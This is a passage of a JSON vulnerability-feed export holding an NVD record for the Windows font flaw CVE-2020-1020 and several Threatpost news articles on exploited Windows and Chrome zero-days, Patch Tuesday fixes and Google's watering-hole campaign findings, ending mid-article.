"cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T07:36:54", "description": "A remote code execution vulnerability exists in Microsoft Windows when the Windows Adobe Type Manager Library improperly handles a specially-crafted multi-master font - Adobe Type 1 PostScript format.For all systems except Windows 10, an attacker who successfully exploited the vulnerability could execute code remotely, aka 'Adobe Font Manager Library Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-0938.", "edition": 6, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-04-15T15:15:00", "title": "CVE-2020-1020", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1020"], "modified": "2020-05-14T14:20:00", "cpe": ["cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:1803", "cpe:/o:microsoft:windows_server_2016:1803", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_10:1903", "cpe:/o:microsoft:windows_10:1709", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_server_2016:1903"], "id": "CVE-2020-1020", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-1020", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1709:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:itanium:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*"]}], "threatpost": [{"lastseen": "2021-01-13T17:23:32", "bulletinFamily": "info", "cvelist": ["CVE-2020-0938", "CVE-2020-1020", "CVE-2020-1027", "CVE-2020-6418"], "description": "Google researchers have detailed a major hacking campaign that was detected in early 2020, which mounted a series of sophisticated attacks, some using zero-day flaws, against [Windows](<https://threatpost.com/windows-zero-day-circulating-faulty-fix/162610/>) and [Android](<https://threatpost.com/google-warns-of-critical-android-remote-code-execution-bug/162756/>) platforms.\n\nWorking together, researchers from [Google Project Zero](<https://threatpost.com/2-zero-day-bugs-google-chrome/161160/>) and the [Google Threat Analysis Group (TAG)](<https://blog.google/threat-analysis-group/>) uncovered the attacks, which were \u201cperformed by a highly sophisticated actor,\u201d Ryan from Project Zero wrote in the [first](<https://googleprojectzero.blogspot.com/2021/01/introducing-in-wild-series.html>) of a six-part blog series on their research.\n\n\u201cWe discovered two exploit servers delivering different exploit chains via watering-hole attacks,\u201d he wrote. \u201cOne server targeted Windows users, the other targeted Android.\u201d\n\n[](<https://threatpost.com/2020-reader-survey/161168/>)\n\nWatering-hole attacks target organizations\u2019 oft-used websites and inject them with malware, infecting and gaining access to victims\u2019 machines when users visit the infected sites.\n\nIn the case of the attacks that Google researchers uncovered, attackers executed the malicious code remotely on both the Windows and Android servers using Chrome exploits. The exploits used against Windows included [zero-day](<https://threatpost.com/apple-patches-bugs-zero-days/161010/>) flaws, while Android users were targeted with exploit chains using known \u201cn-day\u201d exploits, though they acknowledge it\u2019s possible zero-day vulnerabilities could also have been used, researchers said.\n\nThe team spent months analyzing the attacks, including examining what happened [post-exploitation on Android devices.](<https://googleprojectzero.blogspot.com/2021/01/in-wild-series-android-post-exploitation.html>) In that case, additional payloads were delivered that collected device fingerprinting information, location data, a list of running processes and a list of installed applications for the phone.\n\n## Zero-Day Bugs\n\nThe researchers posted [root-cause analyses ](<https://googleprojectzero.blogspot.com/p/rca.html>)for each of the four Windows zero-day vulnerabilities that they discovered being leveraged in their attacks.\n\nThe first, [CVE-2020-6418](<https://googleprojectzero.blogspot.com/p/cve-2020-6418-chrome-incorrect-side.html>), is a type confusion bug prior to 80.0.3987.122 leading to remote-code execution. It exists in V8 in Google Chrome (Turbofan), which is the component used for processing JavaScript code. It allows a remote attacker to potentially cause heap corruption via a crafted HTML page.\n\nThe second, [CVE-2020-0938](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-0938>), is a a trivial stack-corruption vulnerability in the Windows Font Driver. It can be triggered by loading a Type 1 font that includes a specially crafted BlendDesignPositions object. In the attacks, it was chained with [CVE-2020-1020,](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-1020>) another Windows Font Driver flaw, this time in the processing of the VToHOrigin PostScript font object, also triggered by loading a specially crafted Type 1 font. Both were used for privilege escalation.\n\n\u201cOn Windows 8.1 and earlier versions, the vulnerability was chained with [CVE-2020-1020](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2020-1020>) (a write-what-where condition) to first set up a second stage payload in RWX kernel memory at a known address, and then jump to it through this bug,\u201d according to Google. \u201cThe exploitation process was straightforward because of the simplicity of the issue and high degree of control over the kernel stack. The bug was not exploited on Windows 10.\u201d\n\nAnd finally, [CVE-2020-1027](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-1027>) is a Windows heap buffer overflow in the Client/Server Run-Time Subsystem (CSRSS), which is an essential subsystem that must be running in Windows at all times. The issue was used as a sandbox escape in a browser exploit chain using, at times, all four vulnerabilities.\n\n\u201cThis vulnerability was used in an exploit chain together with a 0-day vulnerability in Chrome (CVE-2020-6418). For older OS versions, even though they were also affected, the attacker would pair CVE-2020-6418 with a different privilege escalation exploit (CVE-2020-1020 and CVE-2020-0938).\u201d\n\nAll have all since been patched.\n\n## Advanced Capabilities\n\nFrom their understanding of the attacks, researchers said that threat actors were operating a \u201ccomplex targeting infrastructure,\u201d though, curiously, they didn\u2019t use it every time.\n\n\u201cIn some cases, the attackers used an initial renderer exploit to develop detailed fingerprints of the users from inside the sandbox,\u201d according to researchers. \u201cIn these cases, the attacker took a slower approach: sending back dozens of parameters from the end user\u2019s device, before deciding whether or not to continue with further exploitation and use a sandbox escape.\u201d\n\nStill other attack scenarios showed attackers choosing to fully exploit a system straightaway; or, not attempting any exploitation at all, researchers observed. \u201cIn the time we had available before the servers were taken down, we were unable to determine what parameters determined the \u2018fast\u2019 or \u2018slow\u2019 exploitation paths,\u201d according to the post.\n\nOverall, whoever was behind the attacks designed the exploit chains to be used modularly for efficiency and flexibility, showing clear evidence that they are experts in what they do, researchers said.\n\n\u201cThey [use] well-engineered, complex code with a variety of novel exploitation methods, mature logging, sophisticated and calculated post-exploitation techniques, and high volumes of anti-analysis and targeting checks,\u201d according to the post.\n\n**Supply-Chain Security: A 10-Point Audit Webinar:** _Is your company\u2019s software supply-chain prepared for an attack? On Wed., Jan. 20 at 2p.m. ET, start identifying weaknesses in your supply-chain with actionable advice from experts \u2013 part of a [limited-engagement and LIVE Threatpost webinar](<https://threatpost.com/webinars/supply-chain-security-a-10-point-audit/?utm_source=ART&utm_medium=ART&utm_campaign=Jan_webinar>). CISOs, AppDev and SysAdmin are invited to ask a panel of A-list cybersecurity experts how they can avoid being caught exposed in a post-SolarWinds-hack world. Attendance is limited: **[Register Now](<https://threatpost.com/webinars/supply-chain-security-a-10-point-audit/?utm_source=ART&utm_medium=ART&utm_campaign=Jan_webinar>)** and reserve a spot for this exclusive Threatpost [Supply-Chain Security webinar](<https://threatpost.com/webinars/supply-chain-security-a-10-point-audit/?utm_source=ART&utm_medium=ART&utm_campaign=Jan_webinar>) \u2013 Jan. 20, 2 p.m. ET._\n", "modified": "2021-01-13T16:57:39", "published": "2021-01-13T16:57:39", "id": "THREATPOST:88098D30DA04E912B06C03B52556385C", "href": "https://threatpost.com/hacks-android-windows-zero-day/163007/", "type": "threatpost", "title": "Sophisticated Hacks Against Android, Windows Reveal Zero-Day Trove", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-16T22:51:25", "bulletinFamily": "info", "cvelist": ["CVE-2020-0927", "CVE-2020-0929", "CVE-2020-0931", "CVE-2020-0932", "CVE-2020-0935", "CVE-2020-0938", "CVE-2020-0968", "CVE-2020-0974", "CVE-2020-0981", "CVE-2020-0993", "CVE-2020-1020", "CVE-2020-1027"], "description": "Microsoft has released its April 2020 Patch Tuesday security updates, its first big patch update released since the [work-from-home era](<https://threatpost.com/malware-risks-triple-for-remote-workers/154735/>) truly got underway. It\u2019s a doozie, with the tech giant disclosing 113 vulnerabilities.\n\nOut of these, 19 are rated as critical, and 94 are rated as important. Crucially, four of the vulnerabilities are being exploited in the wild; and two of them were previously publicly disclosed.\n\nIn all, [the update](<https://portal.msrc.microsoft.com/en-us/security-guidance/releasenotedetail/2020-Apr>) includes patches for Microsoft Windows, Microsoft Edge (EdgeHTML-based and the Chromium-based versions), ChakraCore, Internet Explorer, Microsoft Office and Microsoft Office Services and Web Apps, Windows Defender, Visual Studio, Microsoft Dynamics, and Microsoft Apps for Android and Mac. They run the gamut from information disclosure and privilege escalation to remote code execution (RCE) and cross-site scripting (XSS).\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nMicrosoft has seen a 44 percent increase year-over-year in the number of CVEs patched between January to April, according to Trend Micro\u2019s Zero Day Initiative (ZDI) \u2013 a likely result of an increasing number of researchers looking for bugs and an expanding portfolio of supported products. In March, Patch Tuesday [contained 115 updates](<https://threatpost.com/microsoft-patches-bugs-march-update/153597/>); in February, Microsoft [patched 99 bugs](<https://threatpost.com/microsoft-active-attacks-air-gap-99-patches/152807/>); and in January, it [tackled 50 flaws](<https://threatpost.com/microsoft-patches-crypto-bug/151842/>).\n\nAlso for this week, Oracle [patched a whopping 405 security vulnerabilities](<https://threatpost.com/oracle-tackles-405-bugs-for-april-quarterly-patch-update/154737/>) \u2013 while on the other end of the spectrum, Adobe went light, with [only five CVEs](<https://threatpost.com/adobe-fixes-important-flaws-in-coldfusion-after-effects-and-digital-editions/154780/>) addressed for April.\n\n**Bugs Under Active Exploit**\n\nOn the zero-day front, Microsoft patched [CVE-2020-0968](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0968>), a critical-level memory-corruption vulnerability in Internet Explorer that was exploited in the wild. The bug allows RCE, and exists due to the improper handling of objects in memory by the scripting engine.\n\n\u201cThere are multiple scenarios in which this vulnerability could be exploited,\u201d Satnam Narang, principal research engineer at Tenable, told Threatpost. \u201cThe primary way would be to socially engineer a user into visiting a website containing the malicious code, whether owned by the attacker, or a compromised website with the malicious code injected into it. An attacker could also socially engineer the user into opening a malicious Microsoft Office document that embeds the malicious code.\u201d\n\nChris Hass, director of information security and research for Automox, told Threatpost that CVE-2020-0968 is a perfect vulnerability for use for drive-by compromise.\n\n\u201cIf the current user is logged in as admin, an attacker could host a specially crafted website, hosting this vulnerability, once the unpatched user navigates the malicious site, the attacker could then exploit this bug, allowing the attacker to gain remote access the host,\u201d he explained. \u201cThis bug would allow the attacker to view, change, delete data or even install ransomware.\u201d\n\nAlthough the scope of this vulnerability is somewhat limited because IE has seen a steady decline in user-base, it still remains an attractive vector for cybercriminals, Hass added.\n\nMeanwhile, two of the actively exploited bugs are important-rated RCE issues related to the Windows Adobe Type Manager Library.\n\nThe first, [CVE-2020-1020](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1020>), was already made public. It arises because the library improperly handles a specially-crafted multi-master font, the Adobe Type 1 PostScript format.\n\n\u201cAttackers can use this vulnerability to execute their code on affected systems if they can convince a user to view a specially crafted font,\u201d according to Dustin Childs, with ZDI, in a [Patch Tuesday analysis](<https://www.zerodayinitiative.com/blog/2020/4/14/the-april-2020-security-update-review>). \u201cThe code would run at the level of the logged-on user.\u201d\n\nThe related bug is the zero-day [CVE-2020-0938](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0938>), an RCE vulnerability that impacts an OpenType font renderer within Windows. Again, an attacker could execute code on a target system if a user viewed a specially crafted font.\n\nThough the two are related, \u201cthere is currently no confirmation that the two are related to the same set of in-the-wild attacks,\u201d Narang told Threatpost. As for attack vector, \u201cto exploit these flaws, an attacker would need to socially engineer a user into opening a malicious document or viewing the document in the Windows Preview pane,\u201d he added.\n\nBoth of these bugs have been used for Windows 7 systems \u2013 and Childs noted that not all Windows 7 systems will receive a patch since the OS left support in January of this year.\n\nThe final actively exploited bug \u2013 also not previously publicly disclosed \u2013 is [CVE-2020-1027](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1027>), which exists in the way that the Windows Kernel handles objects in memory. \u201cAn attacker who successfully exploited the vulnerability could execute code with elevated permissions,\u201d according to Microsoft, which labeled the flaw \u201cimportant.\u201d\n\nTo exploit the vulnerability, a locally authenticated attacker would need to run a specially crafted application.\n\n**Other Priority Patches**\n\nMicrosoft also patched several notable other bugs that researchers said admins should prioritize in the large update.\n\n[CVE-2020-0935](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0935>) is the second previously disclosed issue, an important-rated privilege-elevation vulnerability found in OneDrive for Windows. It exists due to improper handling of symbolic links (shortcut links), and exploitation would allow an attacker to further compromise systems, execute additional payloads that may need higher privileges to be effective, or gain access to personal or confidential information that was not available previously.\n\n\u201cAn attacker that has gained access to an endpoint could use OneDrive to overwrite a targeted file, leading to an elevated status,\u201d Hass told Threatpost. \u201cOneDrive is extremely popular and often installed by default on Windows 10. When you combine this with remote work, and the ever-growing use of personal devices for remote work, it makes the potential scope for this vulnerability pretty high.\u201d\n\nZDI\u2019s Childs also flagged an important-rated Windows DNS denial-of-service (DoS) bug, [CVE-2020-0993](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0993>), which affects client systems.\n\n\u201cAn attacker could cause the DNS service to be nonresponsive by sending some specially crafted DNS queries to an affected system,\u201d Childs wrote. \u201cConsidering the damage that could be done by an unauthenticated attacker, this should be high on your test and deploy list.\u201d\n\nAnother, [CVE-2020-0981](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0981>), is an important-rated Windows token security feature bypass vulnerability that comes from Windows improperly handling token relationships in Windows 10 version 1903 and higher.\n\n\u201cIt\u2019s not often you see a security feature bypass directly result in a sandbox escape, but that\u2019s exactly what this bug allows,\u201d Childs explained. \u201cAttackers could abuse this to allow an application with a certain integrity level to execute code at a different \u2013 presumably higher \u2013 integrity level.\u201d\n\n**Critical SharePoint Bugs**\n\nSharePoint, a web-based collaborative platform that integrates with Microsoft Office, is often used as a document management and storage system. The platform saw its share of critical problems this month, including four critical RCE bugs, which arise from the fact that the software does not check the source markup of an application package, according to [Microsoft\u2019s advisory](<https://portal.msrc.microsoft.com/en-us/security-guidance/releasenotedetail/2020-Apr>).\n\nThe bug tracked as [CVE-2020-0929](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0929>) paves the way for RCE and affects Microsoft SharePoint Enterprise Server 2016, Microsoft SharePoint Foundation 2010 Service Pack 2, Microsoft SharePoint Foundation 2013 Service Pack 1 and Microsoft SharePoint Server 2019.\n\nA second critical bug ([CVE-2020-0931](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0931>)) also would allow RCE; it affects Microsoft Business Productivity Servers 2010 Service Pack 2, Microsoft SharePoint Enterprise Server 2013 Service Pack 1, Microsoft SharePoint Enterprise Server 2016, Microsoft SharePoint Foundation 2013 Service Pack 1, and Microsoft SharePoint Server 2019.\n\nYet another RCE problem ([CVE-2020-0932](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0932>)) impacts Microsoft SharePoint Enterprise Server 2016, Microsoft SharePoint Foundation 2013 Service Pack 1 and Microsoft SharePoint Server 2019; and [CVE-2020-0974](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0974>) affects Microsoft SharePoint Enterprise Server 2016 and Microsoft SharePoint Server 2019.\n\nFor all of the RCE bugs, \u201can attacker who successfully exploited the vulnerability could run arbitrary code in the context of the SharePoint application pool and the SharePoint server farm account,\u201d Microsoft said in the individual bug advisories. An attacker could exploit any of them by uploading a specially crafted SharePoint application package to an affected version of SharePoint.\n\nSharePoint also harbors a fifth critical bug, [CVE-2020-0927](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0927>). This is an XSS flaw that affects Microsoft SharePoint Server 2019 and Enterprise Server 2016 and would allow spoofing.\n\n**Not One to Skip Amidst WFH**\n\nEven though IT and security organizations are already strained with the added stress of the sudden shift to remote working in the face of the coronavirus pandemic, April\u2019s Patch Tuesday is not one to skip, Richard Melick, senior technical product manager at Automox, told Threatpost \u2014 least of all given the four actively exploited bugs.\n\n\u201cFrom increasingly diverse technological environments to a list of unknown connectivity factors, IT and SecOps managers need to create a deployment plan that addresses today\u2019s zero-day, exploited and critical vulnerabilities within 24 hours and the rest within 72 hours in order to stay ahead of weaponization,\u201d he advised. \u201cHackers are not taking time off; they are working just as hard as everyone else.\u201d\n\nMelick also said that the consequences of exploitation could be exacerbated given the [work-from-home (WFH) lapses in security](<https://threatpost.com/beyond-zoom-safe-slack-collaboration-apps/154446/>) that may be present.\n\n\u201cWith today\u2019s remote workforce environment and the necessity of sharing documents through email or file share, all it takes is one phishing email, malicious website or exploited document to open the door for an attacker,\u201d he said. \u201cOnce in, a malicious party would have the ability to modify data, install backdoors or new software, or gain full user rights accounts. While older versions of Windows are more susceptible to both exploits, the adoption rate of Windows 10 is only a little above 50 percent, leaving more than enough targets for attackers.\u201d\n\nTeams should be ready for plenty of overhead in terms of the patching work involved, added Jonathan Cran, head of research at Kenna Security.\n\n\u201cGiven the shift to remote work for many organizations in combination with the current patch load from Oracle\u2019s update earlier this week and what looks like a backlog of patching, this looks like a busy month for many security teams,\u201d Cran told Threatpost. \u201cWe have yet to see how work from home impacts patching rates, but for security teams, installing numerous patches on remote employee laptops, likely via a corporate VPN to the Windows Server Update Services or Microsoft System Center Configuration Manager, will be a resource- and time-intensive endeavor.\u201d\n\n**_Worried about your cloud security in the work-from-home era? On _****_April 23 at 2 p.m. ET_****_, join DivvyCloud and Threatpost for a FREE webinar, _**[**_A Practical Guide to Securing the Cloud in the Face of Crisis_**](<https://attendee.gotowebinar.com/register/4136632530104301068?source=art>)**_. Get exclusive research insights and critical, advanced takeaways on how to avoid cloud disruption and chaos in the face of COVID-19 \u2013 and during all times of crisis. _**[**_Please register here_**](<https://attendee.gotowebinar.com/register/4136632530104301068?source=art>)_** for this sponsored webinar.**_\n", "modified": "2020-04-14T19:45:49", "published": "2020-04-14T19:45:49", "id": "THREATPOST:310514802AFEB1D9D3CB611D5E2B576A", "href": "https://threatpost.com/april-patch-tuesday-microsoft-active-exploit/154794/", "type": "threatpost", "title": "April Patch Tuesday: Microsoft Battles 4 Bugs Under Active Exploit", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-14T22:29:07", "bulletinFamily": "info", "cvelist": ["CVE-2020-6407", "CVE-2020-6418"], "description": "Google said Monday it has patched a Chrome web browser zero-day bug being actively exploited in the wild. The flaw affects versions of Chrome running on the Windows, macOS and Linux platforms.\n\nThe zero-day vulnerability, tracked as CVE-2020-6418, is a type of confusion bug and has a severity rating of high. Google said the flaw impacts versions of Chrome released before version 80.0.3987.122. The bug is tied to Chrome\u2019s open-source JavaScript and Web Assembly engine, called V8.\n\nTechnical details of CVE-2020-6418 are being withheld pending patch deployment to a majority of affected versions of the Chrome browser, [according to Google](<https://chromereleases.googleblog.com/2020/02/stable-channel-update-for-desktop_24.html>). Generally speaking, memory corruption vulnerabilities occur when memory is altered without explicit data assignments triggering programming errors, which enable an adversary to execute arbitrary code on targeted devices.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nIn the context web browser engines, a similar memory corruption bug exploited by adversaries [earlier this month](<https://threatpost.com/mozilla-firefox-73-browser-update-fixes-high-severity-rce-bugs/152831/>), enticed victims to visit a specially-crafted web site booby-trapped with and an exploit that took advantage of a browser memory corruption flaw to execute code remotely.\n\nCredited for finding the bug is Google\u2019s Threat Analysis Group and researcher Cl\u00e9ment Lecigne.\n\nGoogle is also warning users of two additional high-severity vulnerabilities. One, tracked as CVE-2020-6407, is an \u201cout of bounds memory access in streams\u201d bug. The other bug, which does not have a CVE assignment, is a flaw tied to an integer overflow in ICU, a flaw commonly associated with triggering a denial of service and possibly to code execution.\n\nMitigation includes Windows, Linux, and macOS users download and install [the latest version of Chrome](<https://support.google.com/chrome/answer/95414?co=GENIE.Platform%3DDesktop&hl=en>).\n", "modified": "2020-02-25T18:34:52", "published": "2020-02-25T18:34:52", "id": "THREATPOST:04ACAD235492D0B01F4F6E92CADC43FF", "href": "https://threatpost.com/google-patches-chrome-browser-zero-day-bug-under-attack/153216/", "type": "threatpost", "title": "Google Patches Chrome Browser Zero-Day Bug, Under Attack", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-21T12:26:16", "bulletinFamily": "info", "cvelist": ["CVE-2019-13720", "CVE-2020-15999", "CVE-2020-16000", "CVE-2020-16001", "CVE-2020-16002", "CVE-2020-16003", "CVE-2020-6418"], "description": "Google released an [update](<https://chromereleases.googleblog.com/2020/10/stable-channel-update-for-desktop_20.html>) to its Chrome browser that patches a zero-day vulnerability in the software\u2019s FreeType font rendering library that was actively being exploited in the wild.\n\nSecurity researcher Sergei Glazunov of [Google Project Zero](<https://googleprojectzero.blogspot.com/>) discovered [the bug](<https://twitter.com/benhawkes/status/1318640422571266048>) which is classified as a type of memory-corruption flaw called a heap buffer overflow in FreeType. Glazunov informed Google of the vulnerability on Monday. Project Zero is an internal security team at the company aimed at finding zero-day vulnerabilities.\n\nBy Tuesday, Google already had released a stable channel update, Chrome version 86.0.4240.111, that deploys five security fixes for Windows, Mac & Linux\u2013among them a fix for the zero-day, which is being tracked as CVE-2020-15999 and is rated as high risk. \n[](<https://threatpost.com/newsletter-sign/>) \n\u201cGoogle is aware of reports that an exploit for CVE-2020-15999 exists in the wild,\u201d Prudhvikumar Bommana of the Google Chrome team wrote in a [blog post](<https://chromereleases.googleblog.com/2020/10/stable-channel-update-for-desktop_20.html>) announcing the update Tuesday. Google did not reveal further details of the active attacks that researchers observed.\n\n[Andrew R. Whalley](<https://twitter.com/arw>), a member of the Chrome security team, gave his team kudos on [Twitter](<https://twitter.com/arw/status/1318640817762807810>) for the \u201csuper-fast\u201d response to the zero-day.\n\nStill, Ben Hawkes, technical lead for the Project Zero team, warned that while Google researchers only observed the Chrome exploit, it\u2019s possible that other implementations of FreeType might be vulnerable as well since Google was so quick in its response to the bug. He referred users to a [fix](<https://savannah.nongnu.org/bugs/?59308>) by Glazunov posted on the FreeType Project page and urged them to update other potentially vulnerable software.\n\n\u201cThe fix is also in today\u2019s stable release of FreeType 2.10.4,\u201d Hawkes [tweeted](<https://twitter.com/benhawkes/status/1318640423485624320>).\n\nMeanwhile, security researchers took to Twitter to encourage people to update their Chrome browsers immediately to avoid falling victim to attackers aiming to exploit the flaw.\n\n\u201cMake sure you update your Chrome today! (restart it!),\u201d [tweeted](<https://twitter.com/securestep9/status/1318679358840754176>) London-based application security consultant Sam Stepanyan.\n\nIn addition to the FreeType zero day, Google patched four other bugs\u2014three of high risk and one of medium risk\u2013in the Chrome update released this week.\n\nThe high-risk vulnerabilities are: CVE-2020-16000, described as \u201cinappropriate implementation in Blink;\u201d CVE-2020-16001, described as \u201cuse after free in media;\u201d and CVE-2020-16002, described as \u201cuse after free in PDFium,\u201d according to the blog post. The medium-risk bug is being tracked as CVE-2020-16003, described as \u201cuse after free in printing,\u201d Bommana wrote.\n\nSo far in the last 12 months Google has patched three zero-day vulnerabilities in its Chrome browser. Prior to this week\u2019s FreeType disclosure, the first was a critical remote code execution vulnerability [patched last Halloween night](<https://threatpost.com/google-discloses-chrome-flaw-exploited-in-the-wild/149784/>) and tracked as CVE-2019-13720, and the second was a type of memory confusion bug tracked as CVE-2020-6418 that was [fixed in February](<https://threatpost.com/google-patches-chrome-browser-zero-day-bug-under-attack/153216/>).\n", "modified": "2020-10-21T12:23:29", "published": "2020-10-21T12:23:29", "id": "THREATPOST:6F7E512F15913694CF17A906715FE678", "href": "https://threatpost.com/google-patches-zero-day-browser/160393/", "type": "threatpost", "title": "Google Patches Actively-Exploited Zero-Day Bug in Chrome Browser", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-11-04T20:29:51", "bulletinFamily": "info", "cvelist": ["CVE-2019-13720", "CVE-2020-14750", "CVE-2020-15999", "CVE-2020-16004", "CVE-2020-16005", "CVE-2020-16007", "CVE-2020-16008", "CVE-2020-16009", "CVE-2020-16010", "CVE-2020-16011", "CVE-2020-6418"], "description": "Flaws in Google\u2019s Chrome desktop and Android-based browsers were patched Monday in an effort to prevent known exploits from being used by attackers. Two separate security bulletins issued by Google warned that it is aware of reports that exploits for both exist in the wild. Google\u2019s Project Zero went one step further and asserted that both bugs are actively being exploited.\n\nIn its [Chrome browser update](<https://chromereleases.googleblog.com/2020/11/stable-channel-update-for-desktop.html>) for Windows, Mac and Linux, Google said that version 86.0.4240.183 fixes 10 vulnerabilities. Tracked as CVE-2020-16009, this bug is the most troubling, rated high-severity and is one of the two with active exploits. The vulnerability is tied to Google\u2019s open source JavaScript and WebAssembly engine called V8. In its disclosure, the flaw is described as an \u201cinappropriate implementation in V8\u201d.\n\nClement Lecigne of Google\u2019s Threat Analysis Group and Samuel Gross of Google Project Zero discovered the Chrome desktop bug on Oct. 29, according to a [blog post](<https://chromereleases.googleblog.com/2020/11/stable-channel-update-for-desktop.html>) announcing the fixes by Prudhvikumar Bommana of the Google Chrome team. If exploited, the V8 bug can be used for remote code execution, according to a separate analysis by Project Zero\u2019s team. \n[](<https://threatpost.com/newsletter-sign/>)\n\nAs for the Android OS-based Chrome browser, also with an active exploit in the wild, Google warned [on Monday](<https://chromereleases.googleblog.com/2020/11/chrome-for-android-update.html>) of a sandbox escape bug (CVE-2020-16010). This vulnerability is rated high-severity and opened up a possible attack based on \u201cheap buffer overflow in UI on Android\u201d conditions. Credited for discovering the bug on Oct. 31 is Maddie Stone, Mark Brand and Sergei Glazunov of Google Project Zero.\n\n## **\u2018Actively Exploited in the Wild\u2019**\n\nGoogle said it was withholding the technical details of both bugs, pending the distribution of patches to effected endpoints. While Google said publicly known exploits existed for both bugs, it did not indicate that either one was under active attack. Google\u2019s own Project Zero technical lead Ben Hawkes tweeted on Monday that both were under active attack.\n\n\u201cToday Chrome fixed two more vulnerabilities that were being actively exploited in 